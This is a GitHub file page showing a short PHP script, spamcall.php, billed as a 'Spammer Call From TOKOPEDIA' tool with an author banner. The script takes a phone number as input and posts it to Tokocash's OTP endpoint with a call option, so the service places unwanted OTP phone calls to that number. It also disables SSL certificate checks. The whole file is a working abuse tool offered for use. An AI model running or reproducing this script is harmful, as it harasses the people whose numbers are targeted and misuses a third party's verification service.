-
Notifications
You must be signed in to change notification settings - Fork 69
Expand file tree
/
Copy pathspamcall.php
More file actions
27 lines (27 loc) · 1.05 KB
/
spamcall.php
File metadata and controls
27 lines (27 loc) · 1.05 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
// Limit 3x Telpon Setiap Satu Nomor
function send($phone){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://www.tokocash.com/oauth/otp"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "msisdn=$phone&accept=call"); $asw = curl_exec($ch);
curl_close($ch);
echo $asw."\n";
}
echo "
############################################################
Spammer Call From TOKOPEDIA
Author By : AyipBontos
Support : Kunjungi Website Kami
Website : https://termux.id
Youtube : Omalip TV
Penggunaannya : Bisa Menggunakan [08/62]
###########################################################\n";
echo "Nomor\nInput : ";
$nomor = trim(fgets(STDIN));
$execute = send($nomor);
print $execute;
?>